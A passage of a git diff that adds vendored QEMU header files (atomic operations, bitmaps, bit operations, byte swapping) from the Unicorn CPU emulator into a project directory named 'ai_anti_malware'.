AES_imc[x][2] = [x].[0d, 0b, 0e, 09]; */ +/* AES_imc[x][3] = [x].[09, 0d, 0b, 0e]; */ +extern const uint32_t AES_imc[256][4]; + +/* +AES_Te0[x] = S [x].[02, 01, 01, 03]; +AES_Te1[x] = S [x].[03, 02, 01, 01]; +AES_Te2[x] = S [x].[01, 03, 02, 01]; +AES_Te3[x] = S [x].[01, 01, 03, 02]; +AES_Te4[x] = S [x].[01, 01, 01, 01]; + +AES_Td0[x] = Si[x].[0e, 09, 0d, 0b]; +AES_Td1[x] = Si[x].[0b, 0e, 09, 0d]; +AES_Td2[x] = Si[x].[0d, 0b, 0e, 09]; +AES_Td3[x] = Si[x].[09, 0d, 0b, 0e]; +AES_Td4[x] = Si[x].[01, 01, 01, 01]; +*/ + +extern const uint32_t AES_Te0[256], AES_Te1[256], AES_Te2[256], + AES_Te3[256], AES_Te4[256]; +extern const uint32_t AES_Td0[256], AES_Td1[256], AES_Td2[256], + AES_Td3[256], AES_Td4[256]; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/atomic.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/atomic.h new file mode 100644 index 0000000..79c10ef --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/atomic.h @@ -0,0 +1,234 @@ +/* + * Simple interface for atomic operations. + * + * Copyright (C) 2013 Red Hat, Inc. + * + * Author: Paolo Bonzini <pbonzini@redhat.com> + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + * + */ + +#ifndef __QEMU_ATOMIC_H +#define __QEMU_ATOMIC_H 1 + +#include "qemu/compiler.h" + +/* For C11 atomic ops */ + +/* Compiler barrier */ +#ifdef _MSC_VER +void _ReadWriteBarrier(void); +#pragma intrinsic(_ReadWriteBarrier) +#define barrier() do { _ReadWriteBarrier(); } while (0) +#else +#define barrier() ({ asm volatile("" ::: "memory"); (void)0; }) +#endif + +#ifndef __ATOMIC_RELAXED + +/* + * We use GCC builtin if it's available, as that can use mfence on + * 32-bit as well, e.g. if built with -march=pentium-m. However, on + * i386 the spec is buggy, and the implementation followed it until + * 4.3 (http://gcc.gnu.org/bugzilla/show_bug.cgi?id=36793). + */ +#if defined(__i386__) || defined(__x86_64__) +#if !QEMU_GNUC_PREREQ(4, 4) +#if defined __x86_64__ +# ifdef _MSC_VER +// TODO: fix me!!! +# define smp_mb() //{ __asm volatile("mfence" ::: "memory"); (void)0; } +# else +# define smp_mb() ({ asm volatile("mfence" ::: "memory"); (void)0; }) +# endif +#else +# ifdef _MSC_VER +// TODO: fix me!!! +# define smp_mb() //{ __asm volatile("lock; addl $0,0(%esp) " ::: "memory"); (void)0; } +# else +# define smp_mb() ({ asm volatile("lock; addl $0,0(%%esp) " ::: "memory"); (void)0; }) +# endif +#endif +#endif +#endif + + +#ifdef __alpha__ +#define smp_read_barrier_depends() asm volatile("mb":::"memory") +#endif + +#if defined(__i386__) || defined(__x86_64__) || defined(__s390x__) + +/* + * Because of the strongly ordered storage model, wmb() and rmb() are nops + * here (a compiler barrier only). QEMU doesn't do accesses to write-combining + * qemu memory or non-temporal load/stores from C code. + */ +#define smp_wmb() barrier() +#define smp_rmb() barrier() + +/* + * __sync_lock_test_and_set() is documented to be an acquire barrier only, + * but it is a full barrier at the hardware level. Add a compiler barrier + * to make it a full barrier also at the compiler level. + */ +#define atomic_xchg(ptr, i) (barrier(), __sync_lock_test_and_set(ptr, i)) + +/* + * Load/store with Java volatile semantics. + */ +#define atomic_mb_set(ptr, i) ((void)atomic_xchg(ptr, i)) + +#elif defined(_ARCH_PPC) + +/* + * We use an eieio() for wmb() on powerpc. This assumes we don't + * need to order cacheable and non-cacheable stores with respect to + * each other. + * + * smp_mb has the same problem as on x86 for not-very-new GCC + * (http://patchwork.ozlabs.org/patch/126184/, Nov 2011). + */ +#define smp_wmb() ({ asm volatile("eieio" ::: "memory"); (void)0; }) +#if defined(__powerpc64__) +#define smp_rmb() ({ asm volatile("lwsync" ::: "memory"); (void)0; }) +#else +#define smp_rmb() ({ asm volatile("sync" ::: "memory"); (void)0; }) +#endif +#define smp_mb() ({ asm volatile("sync" ::: "memory"); (void)0; }) + +#endif /* _ARCH_PPC */ + +#endif /* C11 atomics */ + +/* + * For (host) platforms we don't have explicit barrier definitions + * for, we use the gcc __sync_synchronize() primitive to generate a + * full barrier. This should be safe on all platforms, though it may + * be overkill for smp_wmb() and smp_rmb(). + */ +#ifndef smp_mb +#define smp_mb() __sync_synchronize() +#endif + +#ifndef smp_wmb +#ifdef __ATOMIC_RELEASE +#define smp_wmb() __atomic_thread_fence(__ATOMIC_RELEASE) +#else +#define smp_wmb() __sync_synchronize() +#endif +#endif + +#ifndef smp_rmb +#ifdef __ATOMIC_ACQUIRE +#define smp_rmb() __atomic_thread_fence(__ATOMIC_ACQUIRE) +#else +#define smp_rmb() __sync_synchronize() +#endif +#endif + +#ifndef smp_read_barrier_depends +#ifdef __ATOMIC_CONSUME +#define smp_read_barrier_depends() __atomic_thread_fence(__ATOMIC_CONSUME) +#else +#define smp_read_barrier_depends() barrier() +#endif +#endif + +#ifndef atomic_read +#define atomic_read(ptr) (*(__typeof__(*ptr) *volatile) (ptr)) +#endif + +#ifndef atomic_set +#define atomic_set(ptr, i) ((*(__typeof__(*ptr) *volatile) (ptr)) = (i)) +#endif + +/* These have the same semantics as Java volatile variables. + * See http://gee.cs.oswego.edu/dl/jmm/cookbook.html: + * "1. Issue a StoreStore barrier (wmb) before each volatile store." + * 2. Issue a StoreLoad barrier after each volatile store. + * Note that you could instead issue one before each volatile load, but + * this would be slower for typical programs using volatiles in which + * reads greatly outnumber writes. Alternatively, if available, you + * can implement volatile store as an atomic instruction (for example + * XCHG on x86) and omit the barrier. This may be more efficient if + * atomic instructions are cheaper than StoreLoad barriers. + * 3. Issue LoadLoad and LoadStore barriers after each volatile load." + * + * If you prefer to think in terms of "pairing" of memory barriers, + * an atomic_mb_read pairs with an atomic_mb_set. + * + * And for the few ia64 lovers that exist, an atomic_mb_read is a ld.acq, + * while an atomic_mb_set is a st.rel followed by a memory barrier. + * + * These are a bit weaker than __atomic_load/store with __ATOMIC_SEQ_CST + * (see docs/atomics.txt), and I'm not sure that __ATOMIC_ACQ_REL is enough. + * Just always use the barriers manually by the rules above. + */ +#ifndef atomic_mb_read +#define atomic_mb_read(ptr) ({ \ + typeof(*ptr) _val = atomic_read(ptr); \ + smp_rmb(); \ + _val; \ +}) +#endif + +#ifndef atomic_mb_set +#define atomic_mb_set(ptr, i) do { \ + smp_wmb(); \ + atomic_set(ptr, i); \ + smp_mb(); \ +} while (0) +#endif + +#ifndef atomic_xchg +#if defined(__clang__) +#define atomic_xchg(ptr, i) __sync_swap(ptr, i) +#elif defined(__ATOMIC_SEQ_CST) +#define atomic_xchg(ptr, i) ({ \ + typeof(*ptr) _new = (i), _old; \ + __atomic_exchange(ptr, &_new, &_old, __ATOMIC_SEQ_CST); \ + _old; \ +}) +#else +/* __sync_lock_test_and_set() is documented to be an acquire barrier only. */ +#define atomic_xchg(ptr, i) (smp_mb(), __sync_lock_test_and_set(ptr, i)) +#endif +#endif + +/* Provide shorter names for GCC atomic builtins. */ +#ifdef _MSC_VER +// these return the new value (so we make it return the previous value) +#define atomic_fetch_inc(ptr) ((InterlockedIncrement(ptr))-1) +#define atomic_fetch_dec(ptr) ((InterlockedDecrement(ptr))+1) +#define atomic_fetch_add(ptr, n) ((InterlockedAdd(ptr, n))-n) +#define atomic_fetch_sub(ptr, n) ((InterlockedAdd(ptr, -n))+n) +#else +// these return the previous value +#define atomic_fetch_inc(ptr) __sync_fetch_and_add(ptr, 1) +#define atomic_fetch_dec(ptr) __sync_fetch_and_add(ptr, -1) +#define atomic_fetch_add __sync_fetch_and_add +#define atomic_fetch_sub __sync_fetch_and_sub +#define atomic_fetch_and __sync_fetch_and_and +#define atomic_fetch_or __sync_fetch_and_or +#define atomic_cmpxchg __sync_val_compare_and_swap +#endif + +/* And even shorter names that return void. */ +#ifdef _MSC_VER +#define atomic_inc(ptr) ((void) InterlockedIncrement(ptr)) +#define atomic_dec(ptr) ((void) InterlockedDecrement(ptr)) +#define atomic_add(ptr, n) ((void) InterlockedAdd(ptr, n)) +#define atomic_sub(ptr, n) ((void) InterlockedAdd(ptr, -n)) +#else +#define atomic_inc(ptr) ((void) __sync_fetch_and_add(ptr, 1)) +#define atomic_dec(ptr) ((void) __sync_fetch_and_add(ptr, -1)) +#define atomic_add(ptr, n) ((void) __sync_fetch_and_add(ptr, n)) +#define atomic_sub(ptr, n) ((void) __sync_fetch_and_sub(ptr, n)) +#define atomic_and(ptr, n) ((void) __sync_fetch_and_and(ptr, n)) +#define atomic_or(ptr, n) ((void) __sync_fetch_and_or(ptr, n)) +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bitmap.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bitmap.h new file mode 100644 index 0000000..b8faee8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bitmap.h @@ -0,0 +1,61 @@ +/* + * Bitmap Module + * + * Copyright (C) 2010 Corentin Chary <corentin.chary@gmail.com> + * + * Mostly inspired by (stolen from) linux/bitmap.h and linux/bitops.h + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#ifndef BITMAP_H +#define BITMAP_H + +#include "glib_compat.h" +#include <string.h> +#include <stdlib.h> + +#include "qemu/osdep.h" +#include "qemu/bitops.h" + +/* + * The available bitmap operations and their rough meaning in the + * case that the bitmap is a single unsigned long are thus: + * + * Note that nbits should be always a compile time evaluable constant. + * Otherwise many inlines will generate horrible code. + * + * qemu_bitmap_set(dst, pos, nbits) Set specified bit area + * qemu_bitmap_clear(dst, pos, nbits) Clear specified bit area + */ + +/* + * Also the following operations apply to bitmaps. + * + * set_bit(bit, addr) *addr |= bit + * clear_bit(bit, addr) *addr &= ~bit + */ + +#define BITMAP_LAST_WORD_MASK(nbits) \ + ( \ + ((nbits) % BITS_PER_LONG) ? \ + (1UL<<((nbits) % BITS_PER_LONG))-1 : ~0UL \ + ) + +#define DECLARE_BITMAP(name,bits) \ + unsigned long name[BITS_TO_LONGS(bits)] + +void qemu_bitmap_set(unsigned long *map, long i, long len); +void qemu_bitmap_clear(unsigned long *map, long start, long nr); + +static inline unsigned long *bitmap_zero_extend(unsigned long *old, + long old_nbits, long new_nbits) +{ + long new_len = BITS_TO_LONGS(new_nbits) * sizeof(unsigned long); + unsigned long *new = g_realloc(old, new_len); + qemu_bitmap_clear(new, old_nbits, new_nbits - old_nbits); + return new; +} + +#endif /* BITMAP_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bitops.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bitops.h new file mode 100644 index 0000000..b523df9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bitops.h @@ -0,0 +1,408 @@ +/* + * Bitops Module + * + * Copyright (C) 2010 Corentin Chary <corentin.chary@gmail.com> + * + * Mostly inspired by (stolen from) linux/bitmap.h and linux/bitops.h + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#ifndef BITOPS_H +#define BITOPS_H + +#include "unicorn/platform.h" +#include <assert.h> + +#include "host-utils.h" + +#define BITS_PER_BYTE CHAR_BIT +#define BITS_PER_LONG (sizeof (unsigned long) * BITS_PER_BYTE) + +#define BIT(nr) (1UL << (nr)) +#define BIT_MASK(nr) (1UL << ((nr) % BITS_PER_LONG)) +#define BIT_WORD(nr) ((nr) / BITS_PER_LONG) +#define BITS_TO_LONGS(nr) DIV_ROUND_UP(nr, BITS_PER_BYTE * sizeof(long)) + +/** + * set_bit - Set a bit in memory + * @nr: the bit to set + * @addr: the address to start counting from + */ +static inline void set_bit(long nr, unsigned long *addr) +{ + unsigned long mask = BIT_MASK(nr); + unsigned long *p = addr + BIT_WORD(nr); + + *p |= mask; +} + +/** + * clear_bit - Clears a bit in memory + * @nr: Bit to clear + * @addr: Address to start counting from + */ +static inline void clear_bit(long nr, unsigned long *addr) +{ + unsigned long mask = BIT_MASK(nr); + unsigned long *p = addr + BIT_WORD(nr); + + *p &= ~mask; +} + +/** + * change_bit - Toggle a bit in memory + * @nr: Bit to change + * @addr: Address to start counting from + */ +static inline void change_bit(long nr, unsigned long *addr) +{ + unsigned long mask = BIT_MASK(nr); + unsigned long *p = addr + BIT_WORD(nr); + + *p ^= mask; +} + +/** + * test_and_set_bit - Set a bit and return its old value + * @nr: Bit to set + * @addr: Address to count from + */ +static inline int test_and_set_bit(long nr, unsigned long *addr) +{ + unsigned long mask = BIT_MASK(nr); + unsigned long *p = addr + BIT_WORD(nr); + unsigned long old = *p; + + *p = old | mask; + return (old & mask) != 0; +} + +/** + * test_and_clear_bit - Clear a bit and return its old value + * @nr: Bit to clear + * @addr: Address to count from + */ +static inline int test_and_clear_bit(long nr, unsigned long *addr) +{ + unsigned long mask = BIT_MASK(nr); + unsigned long *p = addr + BIT_WORD(nr); + unsigned long old = *p; + + *p = old & ~mask; + return (old & mask) != 0; +} + +/** + * test_and_change_bit - Change a bit and return its old value + * @nr: Bit to change + * @addr: Address to count from + */ +static inline int test_and_change_bit(long nr, unsigned long *addr) +{ + unsigned long mask = BIT_MASK(nr); + unsigned long *p = addr + BIT_WORD(nr); + unsigned long old = *p; + + *p = old ^ mask; + return (old & mask) != 0; +} + +/** + * test_bit - Determine whether a bit is set + * @nr: bit number to test + * @addr: Address to start counting from + */ +static inline int test_bit(long nr, const unsigned long *addr) +{ + return 1UL & (addr[BIT_WORD(nr)] >> (nr & (BITS_PER_LONG-1))); +} + +/** + * find_next_bit - find the next set bit in a memory region + * @addr: The address to base the search on + * @offset: The bitnumber to start searching at + * @size: The bitmap size in bits + */ +unsigned long find_next_bit(const unsigned long *addr, + unsigned long size, unsigned long offset); + +/** + * find_next_zero_bit - find the next cleared bit in a memory region + * @addr: The address to base the search on + * @offset: The bitnumber to start searching at + * @size: The bitmap size in bits + */ + +unsigned long find_next_zero_bit(const unsigned long *addr, + unsigned long size, + unsigned long offset); + +/** + * find_first_bit - find the first set bit in a memory region + * @addr: The address to start the search at + * @size: The maximum size to search + * + * Returns the bit number of the first set bit. + */ +static inline unsigned long find_first_bit(const unsigned long *addr, + unsigned long size) +{ + unsigned long result, tmp; + + for (result = 0; result < size; result += BITS_PER_LONG) { + tmp = *addr++; + if (tmp) { + result += ctzl(tmp); + return result < size ? result : size; + } + } + /* Not found */ + return size; +} + +/** + * find_first_zero_bit - find the first cleared bit in a memory region + * @addr: The address to start the search at + * @size: The maximum size to search + * + * Returns the bit number of the first cleared bit. + */ +static inline unsigned long find_first_zero_bit(const unsigned long *addr, + unsigned long size) +{ + return find_next_zero_bit(addr, size, 0); +} + +static inline unsigned long hweight_long(unsigned long w) +{ + unsigned long count; + + for (count = 0; w; w >>= 1) { + count += w & 1; + } + return count; +} + +/** + * rol8 - rotate an 8-bit value left + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint8_t rol8(uint8_t word, unsigned int shift) +{ + return (word << shift) | (word >> (8 - shift)); +} + +/** + * ror8 - rotate an 8-bit value right + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint8_t ror8(uint8_t word, unsigned int shift) +{ + return (word >> shift) | (word << (8 - shift)); +} + +/** + * rol16 - rotate a 16-bit value left + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint16_t rol16(uint16_t word, unsigned int shift) +{ + return (word << shift) | (word >> (16 - shift)); +} + +/** + * ror16 - rotate a 16-bit value right + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint16_t ror16(uint16_t word, unsigned int shift) +{ + return (word >> shift) | (word << (16 - shift)); +} + +/** + * rol32 - rotate a 32-bit value left + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint32_t rol32(uint32_t word, unsigned int shift) +{ + return (word << shift) | (word >> (32 - shift)); +} + +/** + * ror32 - rotate a 32-bit value right + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint32_t ror32(uint32_t word, unsigned int shift) +{ + return (word >> shift) | (word << ((32 - shift) & 0x1f)); +} + +/** + * rol64 - rotate a 64-bit value left + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint64_t rol64(uint64_t word, unsigned int shift) +{ + return (word << shift) | (word >> (64 - shift)); +} + +/** + * ror64 - rotate a 64-bit value right + * @word: value to rotate + * @shift: bits to roll + */ +static inline uint64_t ror64(uint64_t word, unsigned int shift) +{ + return (word >> shift) | (word << (64 - shift)); +} + +/** + * extract32: + * @value: the value to extract the bit field from + * @start: the lowest bit in the bit field (numbered from 0) + * @length: the length of the bit field + * + * Extract from the 32 bit input @value the bit field specified by the + * @start and @length parameters, and return it. The bit field must + * lie entirely within the 32 bit word. It is valid to request that + * all 32 bits are returned (ie @length 32 and @start 0). + * + * Returns: the value of the bit field extracted from the input value. + */ +static inline uint32_t extract32(uint32_t value, int start, int length) +{ + assert(start >= 0 && length > 0 && length <= 32 - start); + return (value >> start) & (~0U >> (32 - length)); +} + +/** + * extract64: + * @value: the value to extract the bit field from + * @start: the lowest bit in the bit field (numbered from 0) + * @length: the length of the bit field + * + * Extract from the 64 bit input @value the bit field specified by the + * @start and @length parameters, and return it. The bit field must + * lie entirely within the 64 bit word. It is valid to request that + * all 64 bits are returned (ie @length 64 and @start 0). + * + * Returns: the value of the bit field extracted from the input value. + */ +static inline uint64_t extract64(uint64_t value, int start, int length) +{ + assert(start >= 0 && length > 0 && length <= 64 - start); + return (value >> start) & (~0ULL >> (64 - length)); +} + +/** + * sextract32: + * @value: the value to extract the bit field from + * @start: the lowest bit in the bit field (numbered from 0) + * @length: the length of the bit field + * + * Extract from the 32 bit input @value the bit field specified by the + * @start and @length parameters, and return it, sign extended to + * an int32_t (ie with the most significant bit of the field propagated + * to all the upper bits of the return value). The bit field must lie + * entirely within the 32 bit word. It is valid to request that + * all 32 bits are returned (ie @length 32 and @start 0). + * + * Returns: the sign extended value of the bit field extracted from the + * input value. + */ +static inline int32_t sextract32(uint32_t value, int start, int length) +{ + assert(start >= 0 && length > 0 && length <= 32 - start); + /* Note that this implementation relies on right shift of signed + * integers being an arithmetic shift. + */ + return ((int32_t)(value << (32 - length - start))) >> (32 - length); +} + +/** + * sextract64: + * @value: the value to extract the bit field from + * @start: the lowest bit in the bit field (numbered from 0) + * @length: the length of the bit field + * + * Extract from the 64 bit input @value the bit field specified by the + * @start and @length parameters, and return it, sign extended to + * an int64_t (ie with the most significant bit of the field propagated + * to all the upper bits of the return value). The bit field must lie + * entirely within the 64 bit word. It is valid to request that + * all 64 bits are returned (ie @length 64 and @start 0). + * + * Returns: the sign extended value of the bit field extracted from the + * input value. + */ +static inline uint64_t sextract64(uint64_t value, int start, int length) +{ + assert(start >= 0 && length > 0 && length <= 64 - start); + /* Note that this implementation relies on right shift of signed + * integers being an arithmetic shift. + */ + return ((int64_t)(value << (64 - length - start))) >> (64 - length); +} + +/** + * deposit32: + * @value: initial value to insert bit field into + * @start: the lowest bit in the bit field (numbered from 0) + * @length: the length of the bit field + * @fieldval: the value to insert into the bit field + * + * Deposit @fieldval into the 32 bit @value at the bit field specified + * by the @start and @length parameters, and return the modified + * @value. Bits of @value outside the bit field are not modified. + * Bits of @fieldval above the least significant @length bits are + * ignored. The bit field must lie entirely within the 32 bit word. + * It is valid to request that all 32 bits are modified (ie @length + * 32 and @start 0). + * + * Returns: the modified @value. + */ +static inline uint32_t deposit32(uint32_t value, int start, int length, + uint32_t fieldval) +{ + uint32_t mask; + assert(start >= 0 && length > 0 && length <= 32 - start); + mask = (~0U >> (32 - length)) << start; + return (value & ~mask) | ((fieldval << start) & mask); +} + +/** + * deposit64: + * @value: initial value to insert bit field into + * @start: the lowest bit in the bit field (numbered from 0) + * @length: the length of the bit field + * @fieldval: the value to insert into the bit field + * + * Deposit @fieldval into the 64 bit @value at the bit field specified + * by the @start and @length parameters, and return the modified + * @value. Bits of @value outside the bit field are not modified. + * Bits of @fieldval above the least significant @length bits are + * ignored. The bit field must lie entirely within the 64 bit word. + * It is valid to request that all 64 bits are modified (ie @length + * 64 and @start 0). + * + * Returns: the modified @value. + */ +static inline uint64_t deposit64(uint64_t value, int start, int length, + uint64_t fieldval) +{ + uint64_t mask; + assert(start >= 0 && length > 0 && length <= 64 - start); + mask = (~0ULL >> (64 - length)) << start; + return (value & ~mask) | ((fieldval << start) & mask); +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bswap.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bswap.h new file mode 100644 index 0000000..9d069d0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bswap.h @@ -0,0 +1,434 @@ +#ifndef BSWAP_H +#define BSWAP_H + +#include "config-host.h" +#include "unicorn/platform.h" +#include <limits.h> +#include <string.h> +#include "fpu/softfloat.h" + +#ifdef CONFIG_MACHINE_BSWAP_H +# include <sys/endian.h> +# include <sys/types.h> +# include <machine/bswap.h> +#elif defined(__FreeBSD__) +# include <sys/endian.h> +#elif defined(CONFIG_BYTESWAP_H) +# include <byteswap.h> + +static inline uint16_t bswap16(uint16_t x) +{ + return bswap_16(x); +} + +static inline uint32_t bswap32(uint32_t x) +{ + return bswap_32(x); +} + +static inline uint64_t bswap64(uint64_t x) +{ + return bswap_64(x); +} +# else +static inline uint16_t bswap16(uint16_t x) +{ + return (((x & 0x00ff) << 8) | + ((x & 0xff00) >> 8)); +} + +static inline uint32_t bswap32(uint32_t x) +{ + return (((x & 0x000000ffU) << 24) | + ((x & 0x0000ff00U) << 8) | + ((x & 0x00ff0000U) >> 8) | + ((x & 0xff000000U) >> 24)); +} + +static inline uint64_t bswap64(uint64_t x) +{ + return (((x & 0x00000000000000ffULL) << 56) | + ((x & 0x000000000000ff00ULL) << 40) | + ((x & 0x0000000000ff0000ULL) << 24) | + ((x & 0x00000000ff000000ULL) << 8) | + ((x & 0x000000ff00000000ULL) >> 8) | + ((x & 0x0000ff0000000000ULL) >> 24) | + ((x & 0x00ff000000000000ULL) >> 40) | + ((x & 0xff00000000000000ULL) >> 56)); +} +#endif /* ! CONFIG_MACHINE_BSWAP_H */ + +static inline void bswap16s(uint16_t *s) +{ + *s = bswap16(*s); +} + +static inline void bswap32s(uint32_t *s) +{ + *s = bswap32(*s); +} + +static inline void bswap64s(uint64_t *s) +{ + *s = bswap64(*s); +} + +#if defined(HOST_WORDS_BIGENDIAN) +#define be_bswap(v, size) (v) +#define le_bswap(v, size) glue(bswap, size)(v) +#define be_bswaps(v, size) +#define le_bswaps(p, size) do { *p = glue(bswap, size)(*p); } while(0) +#else +#define le_bswap(v, size) (v) +#define be_bswap(v, size) glue(bswap, size)(v) +#define le_bswaps(v, size) +#define be_bswaps(p, size) do { *p = glue(bswap, size)(*p); } while(0) +#endif + +#define CPU_CONVERT(endian, size, type)\ +static inline type endian ## size ## _to_cpu(type v)\ +{\ + return glue(endian, _bswap)(v, size);\ +}\ +\ +static inline type cpu_to_ ## endian ## size(type v)\ +{\ + return glue(endian, _bswap)(v, size);\ +}\ +\ +static inline void endian ## size ## _to_cpus(type *p)\ +{\ + glue(endian, _bswaps)(p, size);\ +}\ +\ +static inline void cpu_to_ ## endian ## size ## s(type *p)\ +{\ + glue(endian, _bswaps)(p, size);\ +}\ +\ +static inline type endian ## size ## _to_cpup(const type *p)\ +{\ + return glue(glue(endian, size), _to_cpu)(*p);\ +}\ +\ +static inline void cpu_to_ ## endian ## size ## w(type *p, type v)\ +{\ + *p = glue(glue(cpu_to_, endian), size)(v);\ +} + +CPU_CONVERT(be, 16, uint16_t) +CPU_CONVERT(be, 32, uint32_t) +CPU_CONVERT(be, 64, uint64_t) + +CPU_CONVERT(le, 16, uint16_t) +CPU_CONVERT(le, 32, uint32_t) +CPU_CONVERT(le, 64, uint64_t) + +/* len must be one of 1, 2, 4 */ +static inline uint32_t qemu_bswap_len(uint32_t value, int len) +{ + return bswap32(value) >> (32 - 8 * len); +} + +/* Unions for reinterpreting between floats and integers. */ + +typedef union { + float32 f; + uint32_t l; +} CPU_FloatU; + +typedef union { + float64 d; +#if defined(HOST_WORDS_BIGENDIAN) + struct { + uint32_t upper; + uint32_t lower; + } l; +#else + struct { + uint32_t lower; + uint32_t upper; + } l; +#endif + uint64_t ll; +} CPU_DoubleU; + +typedef union { + floatx80 d; + struct { + uint64_t lower; + uint16_t upper; + } l; +} CPU_LDoubleU; + +typedef union { + float128 q; +#if defined(HOST_WORDS_BIGENDIAN) + struct { + uint32_t upmost; + uint32_t upper; + uint32_t lower; + uint32_t lowest; + } l; + struct { + uint64_t upper; + uint64_t lower; + } ll; +#else + struct { + uint32_t lowest; + uint32_t lower; + uint32_t upper; + uint32_t upmost; + } l; + struct { + uint64_t lower; + uint64_t upper; + } ll; +#endif +} CPU_QuadU; + +/* unaligned/endian-independent pointer access */ + +/* + * the generic syntax is: + * + * load: ld{type}{sign}{size}{endian}_p(ptr) + * + * store: st{type}{size}{endian}_p(ptr, val) + * + * Note there are small differences with the softmmu access API! + * + * type is: + * (empty): integer access + * f : float access + * + * sign is: + * (empty): for floats or 32 bit size + * u : unsigned + * s : signed + * + * size is: + * b: 8 bits + * w: 16 bits + * l: 32 bits + * q: 64 bits + * + * endian is: + * he : host endian + * be : big endian + * le : little endian + * (except for byte accesses, which have no endian infix). + */ + +static inline int ldub_p(const void *ptr) +{ + return *(uint8_t *)ptr; +} + +static inline int ldsb_p(const void *ptr) +{ + return *(int8_t *)ptr; +} + +static inline void stb_p(void *ptr, uint8_t v) +{ + *(uint8_t *)ptr = v; +} + +/* Any compiler worth its salt will turn these memcpy into native unaligned + operations. Thus we don't need to play games with packed attributes, or + inline byte-by-byte stores. */ + +static inline int lduw_he_p(const void *ptr) +{ + uint16_t r; + memcpy(&r, ptr, sizeof(r)); + return r; +} + +static inline int ldsw_he_p(const void *ptr) +{ + int16_t r; + memcpy(&r, ptr, sizeof(r)); + return r; +} + +static inline void stw_he_p(void *ptr, uint16_t v) +{ + memcpy(ptr, &v, sizeof(v)); +} + +static inline int ldl_he_p(const void *ptr) +{ + int32_t r; + memcpy(&r, ptr, sizeof(r)); + return r; +} + +static inline void stl_he_p(void *ptr, uint32_t v) +{ + memcpy(ptr, &v, sizeof(v)); +} + +static inline uint64_t ldq_he_p(const void *ptr) +{ + uint64_t r; + memcpy(&r, ptr, sizeof(r)); + return r; +} + +static inline void stq_he_p(void *ptr, uint64_t v) +{ + memcpy(ptr, &v, sizeof(v)); +} + +static inline int lduw_le_p(const void *ptr) +{ + return (uint16_t)le_bswap(lduw_he_p(ptr), 16); +} + +static inline int ldsw_le_p(const void *ptr) +{ + return (int16_t)le_bswap(lduw_he_p(ptr), 16); +} + +static inline int ldl_le_p(const void *ptr) +{ + return le_bswap(ldl_he_p(ptr), 32); +} + +static inline uint64_t ldq_le_p(const void *ptr) +{ + return le_bswap(ldq_he_p(ptr), 64); +} + +static inline void stw_le_p(void *ptr, uint16_t v) +{ + stw_he_p(ptr, le_bswap(v, 16)); +} + +static inline void stl_le_p(void *ptr, uint32_t v) +{ + stl_he_p(ptr, le_bswap(v, 32)); +} + +static inline void stq_le_p(void *ptr, uint64_t v) +{ + stq_he_p(ptr, le_bswap(v, 64)); +} + +/* float access */ + +static inline float32 ldfl_le_p(const void *ptr) +{ + CPU_FloatU u; + u.l = ldl_le_p(ptr); + return u.f; +} + +static inline void stfl_le_p(void *ptr, float32 v) +{ + CPU_FloatU u; + u.f = v; + stl_le_p(ptr, u.l); +} + +static inline float64 ldfq_le_p(const void *ptr) +{ + CPU_DoubleU u; + u.ll = ldq_le_p(ptr); + return u.d; +} + +static inline void stfq_le_p(void *ptr, float64 v) +{ + CPU_DoubleU u; + u.d = v; + stq_le_p(ptr, u.ll); +} + +static inline int lduw_be_p(const void *ptr) +{ + return (uint16_t)be_bswap(lduw_he_p(ptr), 16); +} + +static inline int ldsw_be_p(const void *ptr) +{ + return (int16_t)be_bswap(lduw_he_p(ptr), 16); +} + +static inline int ldl_be_p(const void *ptr) +{ + return be_bswap(ldl_he_p(ptr), 32); +} + +static inline uint64_t ldq_be_p(const void *ptr) +{ + return be_bswap(ldq_he_p(ptr), 64); +} + +static inline void stw_be_p(void *ptr, uint16_t v) +{ + stw_he_p(ptr, be_bswap(v, 16)); +} + +static inline void stl_be_p(void *ptr, uint32_t v) +{ + stl_he_p(ptr, be_bswap(v, 32)); +} + +static inline void stq_be_p(void *ptr, uint64_t v) +{ + stq_he_p(ptr, be_bswap(v, 64)); +} + +/* float access */ + +static inline float32 ldfl_be_p(const void *ptr) +{ + CPU_FloatU u; + u.l = ldl_be_p(ptr); + return u.f; +} + +static inline void stfl_be_p(void *ptr, float32 v) +{ + CPU_FloatU u; + u.f = v; + stl_be_p(ptr, u.l); +} + +static inline float64 ldfq_be_p(const void *ptr) +{ + CPU_DoubleU u; + u.ll = ldq_be_p(ptr); + return u.d; +} + +static inline void stfq_be_p(void *ptr, float64 v) +{ + CPU_DoubleU u; + u.d = v; + stq_be_p(ptr, u.ll); +} + +static inline unsigned long leul_to_cpu(unsigned long v) +{ + /* In order to break an include loop between here and + qemu-common.h, don't rely on HOST_LONG_BITS. */ +#if ULONG_MAX == UINT32_MAX + return le_bswap(v, 32); +#elif ULONG_MAX == UINT64_MAX + return le_bswap(v, 64); +#else +# error Unknown sizeof long +#endif +} + +#undef le_bswap +#undef be_bswap +#undef le_bswaps +#undef be_bswaps + +#endif /* BSWAP_H */ 